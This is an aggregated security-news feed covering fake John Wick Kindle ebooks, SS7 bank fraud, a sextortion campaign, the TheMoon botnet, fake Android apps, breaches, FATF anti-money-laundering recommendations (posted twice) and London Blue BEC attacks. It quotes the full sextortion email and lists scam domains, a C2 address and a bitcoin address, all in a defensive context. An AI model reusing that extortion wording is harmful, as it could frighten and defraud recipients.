Movie stream ebooks gun for John Wick 3 on Kindle store

We discovered a novel spam campaign over the weekend, targeting fans of John Wick on the Amazon Kindle store. The scam itself involves paying for what appears to be the upcoming third movie, which turns out to be a bogus ebook that goes on to hyperlink potential victims to a collection of third-party websites.

How does this begin?

With a dog, a grieving assassin, and a pencil.

Actually, it begins with me hunting for John Wick graphic novels on the Kindle store. What I found isn’t exactly hidden from view—as you can see from the screenshots, the bogus results kick in right under the second genuine entry:

ebooks on phone

What are we looking at here?

Roughly 40 or more individual items uploaded from around January 25 to February 2, each one from a different “author.” At first glance, you might think you’re looking at movies, thanks to the play button icon on each image preview. The fact that each entry is called something along the lines of “John Wick 3: free movie HD” probably helps, too.

ebooks on the store

All of the items are on sale for a variety of prices including £0.99 each, £9.93, £12.19, and up to an astonishing £15.25 (roughly $20 USD). A few of them are listed as free, and all of them have a preview available.

That's an expensive ebook

At this point, someone seeing this may think they’re actually buying a copy of John Wick 3. This is where it gets interesting.

This isn’t John Wick 3, is it?

Correct, it absolutely is not John Wick 3. What we have here is an incredibly basic ebook with a “play movie” image bolted onto the preview. Opening up the preview gives us a slice of “coming soon” style text for the movie, due out in May.

The text reads as follows, and appears to be the same content used in each ebook:

John Wick: Chapter 3 – Parabellum 

When we last observed John Wick, he wasn’t in the best shape as he’d quite recently had a worldwide contract hit put out on him toward the finish of John Wick: Chapter 2.  

So most would agree that the third motion picture in the hit activity establishment, driven by Keanu Reeves, won’t be a steady walk around the recreation center. Indeed, even the full title, John Wick: 

Chapter 3 – Parabellum, insights at the massacre in store as Reeves clarified recently.  

“[It means] get ready for war. It’s a piece of that popular sentence, ‘Si vis pacem, para bellum’ which interprets as, ‘On the off chance that you need harmony, get ready for war’,” he laid out. All things considered, Wick said he’d “execute them all” toward the finish of Chapter 2.

Looking at the “Click here” text isn’t useful on a mobile device, because in practice I couldn’t get it to recognise my clicks. I also couldn’t figure out what the clickable link was from looking at it on the mobile, either. With that in mind, it was time to port over to a desktop and fire up an appropriate reader.

A quick port to a desktop reader later, and we now have a fully clickable link:

Bogus ebook

Where does the link go?

It takes would-be Wick watchers to:

Livemovie(dot)xyz/play(dot)php?movie=458156

Which is a portal that claims to offer up multiple movies:

movie portal

The movie we’re interested in here is John Wick 3:

wick link

No matter what you do at this point, the only option here is “be forwarded to another site” via the register button: 

register

Our tour of the movie world upside-down now takes us to:

Flowerfun(dot)net/en/html/sf/registration/eone.html

movie site

This style of site may be familiar to regular readers. They typically claim to offer all sorts of media content and claim free sign ups, but there’s usually a rolling charge or fees somewhere in the mix. The site says the following:

You agree that, on registration for a Membership, you authorise us to place a pre-authorisation hold (between USD $1.00 to 2.00) on your Payment Card to validate your billing address and other Payment Card information.

Depending on your region, you may find yourself sent to similar sites like:

signup(dot)lymemedia(dot)net

second site

However, there is no further information in the T&C or Privacy Policy for either site that states exactly what sort of payment is (or isn’t) expected after signing up. One thing is for certain: Someone wasting up to £15 on a bogus ebook then bouncing from site to site isn’t going to end up with a legitimate version of John Wick 3.

Don’t set him off

It’s tricky to flag dubious content on the Kindle store, as you have to report each title individually and give reasons. We contacted Amazon customer support and have been informed these ebooks have been escalated to the appropriate teams.

Amazon has had problems with fake ebooks before, though those were in the business of swiping authors’ content and making as much money as possible before being shut down. What we have here are worthless ebooks with no content, save for clickthrough links to streaming portals. At time of writing, the ebooks we discovered are still available for purchase.

If you’re on the hunt for John Wick, the lesson is clear: don’t bring an ebook to a gunfight.

The post Movie stream ebooks gun for John Wick 3 on Kindle store appeared first on Malwarebytes Labs.

Security Affairs: Metro Bank is the first bank that disclosed SS7 attacks against its customers

Metro Bank has become the first major bank to disclose SS7 attacks against its customers, but experts believe it isn’t an isolated case.

A new type of cyber attack was used for the first time against Metro Bank: threat actors are leveraging known flaws in the SS7 signaling protocol to intercept the codes sent via text message to customers to authorize transactions.

Signaling System 7, aka SS7, is a set of protocols developed in 1975 that allows one mobile phone network to connect to another. The information passed from one network to another is needed to route calls and text messages between networks.

The SS7 performs out-of-band signaling in support of the call establishment, billing, routing, and information exchange functions of the public switched telephone network (PSTN).

Attackers exploited the flaws in the SS7 protocol to defeat the two-factor authentication (2FA) used by Metro Bank to protect its customers.

“This activity was typically only within reach of intelligence agencies or surveillance contractors, but now Motherboard has confirmed that this capability is much more widely available in the hands of financially-driven cybercriminal groups, who are using it to empty bank accounts.” reported Motherboard, which first reported the attacks.

“So-called SS7 attacks against banks are, although still relatively rare, much more prevalent than previously reported. Motherboard has identified a specific bank—the UK’s Metro Bank—that fell victim to such an attack.”

ss7 Metro Bank attacks

This is not an isolated case, other banks have also been affected by this specific attack. A Metro Bank spokesman confirmed that only a “small number” of the bank’s customers had been affected.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud. We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.” said the Bank spokesman.

“Of those customers impacted by this type of fraud, an extremely small number have been Metro Bank customers and none have been left out of pocket as a result. Customers should continue to remain vigilant and report any suspicious activity using the number on the back of their card or on our website.”

Metro Bank immediately informed the authorities of the attacks, but many other financial institutions that were affected by SS7 attacks have not disclosed it. 

“We are aware of a known telecommunications vulnerability being exploited to target bank accounts by intercepting SMS text messages used as 2-Factor Authentication (2FA).” said a National Cyber Security Centre spokesman.

“While text messages are not the most secure type of two-factor authentication, they still offer a huge advantage over not using any 2FA at all.”

Karsten Nohl, a researcher from Security Research Labs, conducted numerous studies on the flaws affecting the SS7 protocol and confirmed that many banks suffered similar attacks.

“Some of our clients in the banking industry or other financial services; they see more and more SS7-based [requests],” Karsten Nohl, a researcher from Security Research Labs who has worked on SS7 for years, told Motherboard in a phone call. “All of a sudden you have someone’s text messages.”

British telecom company BT confirmed that it is aware of SS7 attacks being used to commit banking fraud.

“Customer security is our top priority so we’re always upgrading our systems and working with the industry and banks to help protect our customers.” said a BT spokesperson.

Who is behind the SS7 attacks on Metro Bank?

Experts believe a well-resourced and coordinated cybercriminal group of highly skilled professionals is behind the attacks.

“[Graeme Coffey, head of sales at cybersecurity firm AdaptiveMobile] said criminals could have acquired access from legitimate providers, or are piggybacking off that access, making the SS7 requests appear somewhat more legitimate.” concludes Motherboard. “Nohl pointed to how hackers could target someone who already has SS7 access. In 2017, this reporter went undercover as an SMS routing service and was successfully offered SS7 access for around $10,000.”

Pierluigi Paganini

(Security Affairs – SS7 protocol, Metro Bank)

The post Metro Bank is the first bank that disclosed SS7 attacks against its customers appeared first on Security Affairs.


Email authentication use growing steadily in every industry sector

U.S. federal government agencies and many major enterprises have made significant strides to thwart the spread of fake emails, a major cybersecurity attack vector. But many organizations remain susceptible because they’re still not using readily available open standards-based technologies that prevent these fakes from reaching end-user inboxes. Valimail’s “Email Fraud Landscape, Q4 2018” indicates that the fight against fake email is advancing around the world — but email fraud remains a widespread and pernicious problem. … More

The post Email authentication use growing steadily in every industry sector appeared first on Help Net Security.

Security Affairs newsletter Round 199 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Using steganography to obfuscate PDF exploits
Aztarna – the open-source scanning tool for vulnerable robots
Cobalt cybercrime gang abused Google App Engine in recent attacks
Dailymotion forces password reset in response to credential stuffing Attack
Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online
Hackers compromise WordPress sites via Zero-Day flaws in Total Donations plugin
Authorities shut down XDEDIC marketplace in an international operation
Disable FaceTime, a bug lets you hear a person's audio before he answers
Law enforcement worldwide hunting users of DDoS-for-Hire services
Netanyahu accuses Iran of cyber attacks carried out daily
US DoJ charges Huawei sanctions violations and in technology espionage
Facebook paid teens $20 to install a Research App that spies on them
Iran-Linked APT39 group use off-the-shelf tools to steal data
Reading the ENISA Threat Landscape Report 2018
Skyscanner launches a public bug bounty program
Sofacy's Zepakab Downloader Spotted In-The-Wild
Airbus data breach exposes some employees' data
CookieMiner Mac Malware steals browser cookies and sensitive Data
Exclusive: spreading CSV Malware via Google Sheets
Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever
Researchers published the PoC exploit code for Linux SystemD bugs
Facebook dismantled a vast manipulation campaign tied to Iran
State Bank of India left archive with millions of Customer messages exposed
The return of the AdvisorsBot malware
US authorities aim to dismantle North Korea's Joanap Botnet
Apple issued a partial fix for recent FaceTime spying bug
Home Design website Houzz suffered a data breach
IBM experts warn of malicious abuses of Apple Siri Shortcuts
Operators of the TheMoon botnet offer it as a service

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 199 – News of the week appeared first on Security Affairs.


Security Affairs: Experts observed a new sextortion scam Xvideos-themed

A sextortion scam campaign attempts to trick victims into believing that the adult site Xvideos.com was hacked and that crooks recorded its visitors.

The creativity of cybercriminals is inexhaustible: a new variant of the sextortion scam has appeared in the threat landscape. The new campaign attempts to trick victims into believing that the popular adult site Xvideos.com was hacked and that crooks used a malicious script to record visitors through their webcam.

In a classic social engineering scam, the emails sent to the victims also inform them that hackers have stolen their data and contacts; the messages include a user’s old password obtained from third-party data breaches. The hackers threaten to publish the stolen material and the alleged videos unless the victims pay $969 worth of Bitcoin.

“This variant of the sextortion scam has been under way for about a month now, but we first learned about last night when a reader contacted us to see if it was real.” reads a blog post published by BleepingComputer. “Like previous variants, this scam email includes a user’s old password obtained from data breaches and threatens to send videos of the recipients in compromising activities unless they send the attackers a bitcoin payment of $969.”

This is the first time that experts have observed attackers using news of a hacked adult site as bait.

BleepingComputer also published the full text of the messages used in this sextortion campaign.

"xxx is your pass. Lets get straight to purpose. Neither anyone has paid me to check about you. You do not know me and you are most likely wondering why you are getting this e-mail?" reads the message sent to the victims.

"Well, i setup a software on the X video clips (porn material) web site and you know what, you visited this site to have fun (you know what i mean). When you were watching videos, your browser began functioning as a RDP with a key logger which gave me access to your display and also web camera. after that, my software program gathered all your contacts from your Messenger, FB, as well as emailaccount. Next i made a double-screen video. 1st part displays the video you were viewing (you've got a good taste lol . . .), and 2nd part shows the recording of your web camera, yeah its you." 


Is the campaign effective?

To answer that, we have to check the balance of the bitcoin addresses included in the emails used by the scammers.

One of the addresses, 18z5c6TjLUosqPTEnm6q7Q2EVNgbCy16Td, used in this sextortion scam since early January 2019, has received approximately 0.95 bitcoin ($3,200).

Unfortunately, sextortion scams are very profitable for crooks: they are easy and cheap to arrange, and the associated risks are very low.

Other variants of sextortion trick victims into opening a malicious attachment that allows crooks to deliver data stealers and ransomware.

Pierluigi Paganini

(SecurityAffairs – cybercrime, spam)

The post Experts observed a new sextortion scam Xvideos-themed appeared first on Security Affairs.


Security Affairs: Operators of the TheMoon botnet offer it as a service

Researchers at the CenturyLink Threat Research Labs discovered that the operators of the TheMoon IoT botnet are offering it as a service.

Experts at the CenturyLink Threat Research Labs observed a new evolution of the TheMoon IoT botnet: its operators added a previously undocumented module that allows them to offer it under a malware-as-a-service model.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators have added at least 6 IoT device exploits to the bot’s code.
The botnet targets broadband modems and routers from several vendors, including Linksys, ASUS, MikroTik, D-Link, and GPON routers.

In May 2018, researchers from security firm Qihoo 360 Netlab reported that cybercriminals targeting Dasan GPON routers were using another new zero-day flaw affecting the same routers to recruit them into their botnet.

Now CenturyLink Threat Research Labs has collected evidence that the botnet’s operator has sold this proxy botnet as a service to other cybercrime gangs, which were using it for credential brute forcing, video advertisement fraud, general traffic obfuscation, and more.

Experts noticed several devices performing credential brute force attacks on multiple popular websites, then uncovered a C2 operating at 91[.]215[.]158[.]118. This address was associated with a previous TheMoon campaign.

Experts uncovered a video ad fraud operator using TheMoon on a single server that received requests for 19,000 unique URLs on 2,700 unique domains over a six-hour period.

The new module was deployed on MIPS devices and allows operators to abuse infected devices as a SOCKS5 proxy and offer a network proxy as a service.

CenturyLink blocked TheMoon infrastructure on its ISP network and reported its findings to other network owners of potentially infected devices.


Further details, including IoCs, are reported in the analysis published by CenturyLink.

Pierluigi Paganini

(SecurityAffairs – TheMoon botnet, hacking)

The post Operators of the TheMoon botnet offer it as a service appeared first on Security Affairs.


Blog | Avast EN: Fake Android Apps and Phony YouTube Stars | Avast

Fake Android photo apps booted off Google Play

Cybersecurity researchers identified dozens of fake apps on the Google Play Store intended solely for malicious purposes. The apps posed as Android photo enhancers, some claiming to beautify photos as they’re taken, others claiming to provide fun filters for existing pictures. But no matter what the app claimed to be, it didn’t work as promised. The “beautifying” apps triggered a cavalcade of malware-laced ads and phishing attempts, while the “photo filter” apps uploaded user snapshots to the malware’s C&C (Command and Control Server). A trait among each of the dirty apps was the ability to disappear from the application list once installed so the user would have difficulty trying to delete it. Once alerted about the apps, Google immediately removed them from the Play Store.


Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate

Account takeover-based (ATO) attacks now comprise 20 percent of advanced email attacks, according to Agari’s Q1 2019 Email Fraud & Identity Deception Trends report. ATO attacks are dangerous because they are more difficult to detect than traditional attacks – compromised accounts seem legitimate to email filters and end users alike because they are sent from a real sender’s email account. “Credential phishing was already a huge risk for organizations because of the potential for data … More

The post Employees report 23,000 phishing incidents annually, costing $4.3 million to investigate appeared first on Help Net Security.

SecurityWeek RSS Feed: Facebook Takes Down Vast Iran-led Manipulation Campaign

Facebook said Thursday it took down hundreds of "inauthentic" accounts from Iran that were part of a vast manipulation campaign operating in more than 20 countries.

The world's biggest social network said it removed 783 pages, groups and accounts "for engaging in coordinated inauthentic behavior tied to Iran."


Employee Data Compromised in Airbus Breach

Aircraft maker Airbus on Wednesday revealed that information on some of its employees was compromised as a result of a data breach.

According to the company, it detected an intrusion on systems associated with its Commercial Aircraft business, but claims that the incident has not impacted its commercial operations.


SecurityWeek RSS Feed: Yahoo Breach Settlement Rejected by Judge

A U.S. judge has rejected the settlement between Yahoo and users impacted by the massive data breaches suffered by the company, citing, among other things, inadequate disclosure of the settlement fund and high attorney fees.


$1.7 billion in cryptocurrency was stolen and scammed in 2018

$1.7 billion in cryptocurrency was stolen and scammed in 2018 — a dramatic rise in criminal activity despite a slump in the market, according to CipherTrace. Criminals need to launder all these funds in order to cash out before a wave of regulations go into effect in 2019. Theft from cryptocurrency exchanges accounted for the majority of the criminal activity: more than $950 million was stolen in 2018, representing 3.6 times more than in 2017. … More

The post $1.7 billion in cryptocurrency was stolen and scammed in 2018 appeared first on Help Net Security.

CyberCrime & Doing Time: Money Laundering and Counter-Terrorist Financing: What is FATF?

Many cybercrime investigators seem narrowly focused on the bits and bytes of the crimes they investigate while not truly understanding or interacting with those who focus on where the money goes.  As we've been expanding our horizons, I've learned quite a bit and wanted to share some resources for others who may have been similarly limited in their focus.

The Financial Action Task Force (FATF) was established in 1989. It built a list of Forty Recommendations for countries to address Money Laundering, which were first issued in 1990, and revised in 1996, 2001, 2003, and 2012.  Their latest FATF Annual Report (2017-2018) addresses Terrorist financing as well as new methods and trends and announces a research project on financing of recruitment for terrorism.  Many of these Recommendations meet our lives in the form of regulations on financial institutions and interactions between international law enforcement agencies.
"Regardless of their size and complexity, the financial activities and channels of terrorists are an essential source of intelligence.  Financial investigation can identify terrorist cells, their associates and facilitators, and reveal the structure of terrorist groups, and their logistics and facilitation networks." -- FATF President Santiago Otamendi, 14DEC2017, NYC.
FATF also released an important report "Financing of Recruitment for Terrorist Purposes" in January 2018, and a second report "Concealment of Beneficial Ownership" in July 2018.
Beneficial Ownership (July 2018)
Terrorist Recruitment (January 2018)
FATF is composed of 38 member states, covering most of the major financial centers of the world. Each of these member states has pledged to come into compliance with the Forty Recommendations, and to measure its progress.

The FATF Forty Recommendations on Money Laundering and Counter Terrorism Finance

International Standards on Combating Money Laundering and the Financing of Terrorism & Proliferation (Oct 2018)
The Recommendations fall into seven major categories:

A - AML/CFT Policies and Coordination
  • R1. Assessing risks & applying a risk-based approach
  • R2. National cooperation and coordination


B - Money Laundering and Confiscation

  • R3. Money laundering offense 
  • R4. Confiscation and provisional measures


C - Terrorist Financing and Financing of Proliferation

  • R5. Terrorist financing offense
  • R6. Targeted financial sanctions related to terrorism and terrorist financing
  • R7. Targeted financial sanctions related to proliferation 
  • R8. Non-profit organizations


D - Preventative Measures

  • R9. Financial institution secrecy laws
  • R10. Customer due diligence 
  • R11. Record keeping 
  • R12. Politically exposed persons
  • R13. Correspondent banking
  • R14. Money or Value transfer services
  • R15. New technologies
  • R16. Wire transfers 
  • R17. Reliance on third parties 
  • R18. Internal controls and foreign branches and subsidiaries
  • R19. Higher-risk countries
  • R20. Reporting of suspicious transactions
  • R21. Tipping-off and confidentiality 
  • R22. Designated non-Financial Businesses and Professions: Customer due diligence
  • R23. Designated non-Financial Businesses and Professions: Other measures 


E - Transparency and Beneficial Ownership of Legal Persons and Arrangements

  • R24. Transparency and beneficial ownership of legal persons
  • R25. Transparency and beneficial ownership of legal arrangements 


F - Powers and Responsibilities of Competent Authorities and Other Institutional Measures

  • R26. Regulation and supervision of financial institutions
  • R27. Powers of supervisors
  • R28. Regulation and supervision of Designated non-Financial Businesses and Professions
  • R29. Financial intelligence units
  • R30. Responsibilities of law enforcement and investigative authorities 
  • R31. Powers of law enforcement and investigative authorities 
  • R32. Cash couriers 
  • R33. Statistics
  • R34. Guidance and feedback 
  • R35. Sanctions 


G - International Cooperation

  • R36. International instruments 
  • R37. Mutual legal assistance 
  • R38. Mutual legal assistance: freezing and confiscation
  • R39. Extradition 
  • R40. Other forms of international cooperation 


Mutual Evaluation and Ranking of Members

4th Round Ratings
In this chart, each member state, including the Associate members, is ranked on how well it complies with each of the 11 "Immediate Outcomes" and 40 Recommendations.  For example, the United States is currently not compliant with recommendations 22, 23, and 24 -- so we don't do well in non-financial institutions, and our shell company games are impossible to monitor as of now, but we generally do well in most of the others.  Clicking the "4th Round Ratings" label will take you to the full chart.  If you do international business, doing business in countries with poor ratings across the board here may itself be a form of risk.

FATF Associate Members

FATF also has 9 Regional Bodies, considered "FATF Associate Members", each of which puts out specialized information for its portion of the world.  For those who are interested in a particular Region, following up on that region's reports from its representative task forces and groups will be worthwhile.

A Special Focus on Terrorist Financing Risks 

FATF issued their first special report offering guidance on Terrorist Financing in 2008:


Several more recent reports would be especially interesting regarding terrorist financing, stemming from an emergency meeting of 55 states, the United Nations, the Egmont Group of Financial Intelligence Units, the International Monetary Fund, the World Bank, and others specifically to address curbing the financing of ISIS/ISIL.



In the Paris meeting of 19OCT2018, FATF encouraged members to expand their focus from looking specifically at ISIL to more broadly include Al Qaeda and its Affiliates, issuing this guidance:



Regional Terrorist Financing Focuses

There have also been significant regional reports issued by sub-groups and associate members.

The Counter-Terrorism Financing Summit, hosted by Australia's Financial Intelligence Agency (AUSTRAC) and the Indonesian counterpart, Pusat Pelaporan dan Analisis Transaksi Keuangan (PPATK), issued the Regional Risk Assessment on Terrorism Financing 2016.  The following year, the event was repeated, adding Bank Negara Malaysia as a partner.  These events issued two small statements, and one more substantial report, addressing events in Philippines, Thailand, Malaysia, Singapore, Indonesia, and Australia, and how those events were funded.

A risk methodology for their region (p.22)

The Nusa Dua Statement - August 2016 
Kuala Lumpur Communique - November 2017 


West and Central Africa have very different concerns, and held a summit to discuss these differences, resulting in this excellent joint publication: 

"Terrorist Financing in West and Central Africa", October 2016
50 page joint report from FATF, GIABA, and GABAC


Particular Funding Methods for Terrorism Finance

Many other special reports have been issued, related to the trade in:

Virtual Currencies of Growing Concern

In the Paris meeting 19OCT2018, a special issue that was raised was the Regulation of Virtual Currencies.  This was deemed to be a matter of strategic interest that will be further evaluated, especially with regard to Initial Coin Offerings and their role in Money Laundering.  FATF has committed to work with the G20 to come up with new guidelines to update their previous report "Virtual Currencies: Key Definitions and Potential AML/CFT Risks" as well as their report "Guidance for a Risk-based Approach to Virtual Currencies" (June 2015 - 46 page PDF).  

The work so far is in the form of a report to the G20, which addresses many topics in addition to Virutal Currencies:


In part the report shares:

"Noting that virtual currencies/crypto-assets raise issues with respect to money laundering and terrorist financing, they committed to implement the FATF Standards as they apply to virtual currencies/crypto-assets.  They looked forward to the FATF review of those Standards, called on the FATF to advance global implementation, and asked the FATF to provide an update on this work in July 2018.  The FATF will take this work forward under the US presidency from 1 July 2018 to 30 June 2019."

This work begins with first reviewing laws and regulations regarding crypto-assets and virtual currencies in each of the G20 states.

More on this topic will certainly be forth-coming from FATF.






CyberCrime & Doing Time

Money Laundering and Counter-Terrorist Financing: What is FATF?

Many cybercrime investigators seem narrowly focused on the bits and bytes of the crimes they investigate while not truly understanding or interacting with those who focus on where the money goes.  As we've been expanding our horizons, I've learned quite a bit and wanted to share some resources for others who may have been similarly limited in their focus.

The Financial Action Task Force (FATF) was established in 1989. It built a list of Forty Recommendations for countries to address Money Laundering, which were first issued in 1990, and revised in 1996, 2001, 2003, and 2012.  Their latest FATF Annual Report (2017-2018) addresses Terrorist financing as well as new methods and trends and announces a research project on financing of recruitment for terrorism.  Many of these Recommendations meet our lives in the form of regulations on financial institutions and interactions between international law enforcement agencies.
"Regardless of their size and complexity, the financial activities and channels of terrorists are an essential source of intelligence.  Financial investigation can identify terrorist cells, their associates and facilitators, and reveal the structure of terrorist groups, and their logistics and facilitation networks." -- FATF President Santiago Otamendi, 14DEC2017, NYC.
FATF also released an important report "Financing of Recruitment for Terrorist Purposes" in January 2018, and a second report "Concealment of Beneficial Ownership" in July 2018.
Beneficial Ownership (July 2018)
Terrorist Recruitment (January 2018)
FATF is composed of 38 member states, covering most of the major financial centers of the world. Each of these member states has pledged to come into compliance with the Forty Recommendations, and to measure its progress.

The FATF Forty Recommendations on Money Laundering and Counter Terrorism Finance

International Standards on Combating Money Laundering and the Financing of Terrorism & Proliferation (Oct 2018)
The Recommendations fall into seven major categories:

A - AML/CFT Policies and Coordination
  • R1. Assessing risks & applying a risk-based approach
  • R2. National cooperation and coordination


B - Money Laundering and Confiscation

  • R3. Money laundering offense 
  • R4. Confiscation and provisional measures


C - Terrorist Financing and Financing of Proliferation

  • R5. Terrorist financing offense
  • R6. Targeted financial sanctions related to terrorism and terrorist financing
  • R7. Targeted financial sanctions related to proliferation 
  • R8. Non-profit organizations


D - Preventative Measures

  • R9. Financial institution secrecy laws
  • R10. Customer due diligence 
  • R11. Record keeping 
  • R12. Politically exposed persons
  • R13. Correspondent banking
  • R14. Money or Value transfer services
  • R15. New technologies
  • R16. Wire transfers 
  • R17. Reliance on third parties 
  • R18. Internal controls and foreign branches and subsidiaries
  • R19. Higher-risk countries
  • R20. Reporting of suspicious transactions
  • R21. Tipping-off and confidentiality 
  • R22. Designated non-Financial Businesses and Professions: Customer due diligence
  • R23. Designated non-Financial Businesses and Professions: Other measures 


E - Transparency and Beneficial Ownership of Legal Persons and Arrangements

  • R24. Transparency and beneficial ownership of legal persons
  • R25. Transparency and beneficial ownership of legal arrangements 


F - Powers and Responsibilities of Competent Authorities and Other Institutional Measures

  • R26. Regulation and supervision of financial institutions
  • R27. Powers of supervisors
  • R28. Regulation and supervision of Designated non-Financial Businesses and Professions
  • R29. Financial intelligence units
  • R30. Responsibilities of law enforcement and investigative authorities 
  • R31. Powers of law enforcement and investigative authorities 
  • R32. Cash couriers 
  • R33. Statistics
  • R34. Guidance and feedback 
  • R35. Sanctions 


G - International Cooperation

  • R36. International instruments 
  • R37. Mutual legal assistance 
  • R38. Mutual legal assistance: freezing and confiscation
  • R39. Extradition 
  • R40. Other forms of international cooperation 


Mutual Evaluation and Ranking of Members

4th Round Ratings
In this chart, each member state, including the Associate members, is rated on how well it complies with each of the 11 "Immediate Outcomes" and 40 Recommendations.  For example, the United States is currently not compliant with Recommendations 22, 23, and 24 -- so we don't do well on non-financial institutions, and our shell company games are impossible to monitor as of now, but we generally do well on most others.  Clicking the "4th Round Ratings" label will take you to the full chart.  If you do international business, doing business in countries with poor ratings across the board here may itself be a form of risk.

FATF Member Assessments

Each member is encouraged to perform regular assessments to measure themselves on how they are complying with the Forty Recommendations.  Here are example reports from the United States, but these reports are available for every country that participates in FATF or one of the Associate Members.  In the United States, these assessments are published by the Department of the Treasury.  These reports were issued in 2015 by the Treasury Undersecretary for Terrorism and Financial Intelligence, Adam Szubin.

2015 Money Laundering Risk Assessment

2015 Terrorist Financing Risk Assessment

The goal of sharing these examples is to serve as a reminder that from the FATF site, ALL such reports for all member states are available, by looking for the "Mutual Evaluations Publications." As of this writing the four newest ones are from Tunisia, Nicaragua, Panama, and Tajikistan.

FATF Associate Members

FATF also has 9 Regional Bodies, considered "FATF Associate Members", each of which puts out specialized information for its portion of the world.  For those who are interested in a particular region, following up on that region's reports from its task forces and groups will be worthwhile.

A Special Focus on Terrorist Financing Risks 

FATF issued their first special report offering guidance on Terrorist Financing in 2008:


Several more recent reports would be especially interesting regarding terrorist financing, stemming from an emergency meeting of 55 states, the United Nations, the Egmont Group of Financial Intelligence Units, the International Monetary Fund, the World Bank, and others specifically to address curbing the financing of ISIS/ISIL.



In the Paris meeting of 19OCT2018, FATF encouraged members to expand their focus from looking specifically at ISIL to more broadly include Al Qaeda and its Affiliates, issuing this guidance:



Regional Terrorist Financing Focuses

There have also been significant regional reports issued by sub-groups and associate members.

The Counter-Terrorism Financing Summit, hosted by Australia's Financial Intelligence Agency (AUSTRAC) and the Indonesian counterpart, Pusat Pelaporan dan Analisis Transaksi Keuangan (PPATK), issued the Regional Risk Assessment on Terrorism Financing 2016.  The following year, the event was repeated, adding Bank Negara Malaysia as a partner.  These events issued two small statements, and one more substantial report, addressing events in Philippines, Thailand, Malaysia, Singapore, Indonesia, and Australia, and how those events were funded.

A risk methodology for their region (p.22)

The Nusa Dua Statement - August 2016 
Kuala Lumpur Communique - November 2017 


West and Central Africa have very different concerns, and held a summit to discuss these differences, resulting in this excellent joint publication: 

"Terrorist Financing in West and Central Africa", October 2016
50 page joint report from FATF, GIABA, and GABAC


Particular Funding Methods for Terrorism Finance

Many other special reports have been issued, related to the trade in:

Virtual Currencies of Growing Concern

In the Paris meeting 19OCT2018, a special issue that was raised was the Regulation of Virtual Currencies.  This was deemed to be a matter of strategic interest that will be further evaluated, especially with regard to Initial Coin Offerings and their role in Money Laundering.  FATF has committed to work with the G20 to come up with new guidelines to update their previous report "Virtual Currencies: Key Definitions and Potential AML/CFT Risks" as well as their report "Guidance for a Risk-based Approach to Virtual Currencies" (June 2015 - 46 page PDF).  

The work so far is in the form of a report to the G20, which addresses many topics in addition to Virtual Currencies:


In part the report shares:

"Noting that virtual currencies/crypto-assets raise issues with respect to money laundering and terrorist financing, they committed to implement the FATF Standards as they apply to virtual currencies/crypto-assets.  They looked forward to the FATF review of those Standards, called on the FATF to advance global implementation, and asked the FATF to provide an update on this work in July 2018.  The FATF will take this work forward under the US presidency from 1 July 2018 to 30 June 2019."

This work begins with first reviewing laws and regulations regarding crypto-assets and virtual currencies in each of the G20 states.

More on this topic will certainly be forthcoming from FATF.




DoJ Charges Huawei Execs in Broad Indictment Spanning 10 Years of Criminal Activity

The Department of Justice (DoJ) filed broad charges against Chinese telecom giant Huawei Technologies Co. Ltd. and its CFO Wanzhou Meng for allegedly stealing trade secrets from U.S. mobile firm T-Mobile and deceiving U.S. stakeholders about its business activity in Iran, among a number of other fraud and conspiracy activities over a 10-year...


Police Shut Down xDedic – An Online Market for Cyber Criminals

In an international operation involving law enforcement authorities from the U.S. and several European countries, feds have shut down an online underground marketplace and arrested three suspects in Ukraine. Dubbed xDedic, the illegal online marketplace let cybercriminals buy, sell or rent out access to thousands of hacked computers and servers across the world and personally identifiable

Why You Should Be Worried About London Blue’s Business Email Compromise Attacks

Phishing is nothing new, and efforts to train employees on how to detect and thwart phishing attacks should always be an essential component of any security awareness training program. But what happens when phishing attacks specifically target chief financial officers (CFOs)?

Researchers have discovered increasing evidence of a threat group named London Blue, a U.K.-based collective that focuses on CFOs at mortgage companies, accounting firms and some of the world’s largest banks. According to a report passed on to authorities by Agari, London Blue has collected email addresses for more than 50,000 senior-level targets in the U.S. and other countries, of which 71 percent hold a CFO title. The Agari report noted that London Blue operators have been utilizing email display name deception to trick senior employees into making fraudulent payments to the threat group’s accounts.

The ABCs of BEC

This type of attack, classified as business email compromise (BEC), builds on the typical phishing attack by taking the social engineering aspect to the next level — and sometimes includes elaborate hacking into email servers and the takeover of executive email accounts. But perhaps the most concerning feature of London Blue is that it is an organized cybercrime gang (OCCG) and, as such, works as efficiently as any modern corporation, with specific departments for lead generation, financial operations and human resources.

Crane Hassold, Agari’s senior director of threat research, explained that the report came about when London Blue targeted the company’s CFO for a potential BEC attack.

“Once that came in we started doing a little more digging, and there was a lot of active engagement with the scammers to understand more about them,” he said. It took Agari about four months of engagement after first observing the threat group to release the report.

BEC is a hot topic because it has been relatively successful. What’s really interesting to Hassold and his team is that the attack doesn’t require any technical means to get a result.

“When we think of cyberattacks, we think of things like malware-based attacks where there’s something technical that happened, but in this case, it’s pure social engineering,” said Hassold. Given his background with the Federal Bureau of Investigation (FBI)’s Behavioral Analysis Unit, Hassold is keenly aware that social engineering is the conduit to many cyberattacks.

“A lot of work has to go into them in order to make them successful, but the reasons we’re seeing these being used more commonly is that they’re relatively easy to do with no technical knowledge needed to send one of these things out,” he said. Even if these attacks have a success rate of less than 1 percent, Hassold noted, threat actors can still net tens of thousands of dollars a month.

The Simple, Yet Successful Tactics of London Blue

On a positive note, despite being so organized, groups like London Blue are still using old-school tactics such as the “Nigerian prince” scam, in which poor grammar and spelling are prominent. Red flags should be easy to spot. Yet, somehow, these scams still work on a very limited scale.

“They’re still around because they are successful enough,” said Hassold. “Even though most people would look at one of those things and ask ‘how could anyone actually fall for this?’, there’s always going to be a tiny population of people that will fall for it. They prey on central components of the human brain, like trust, fear and anxiety.” Those components are usually on overdrive when an employee gets an email he or she believes is coming from a CEO or CFO.

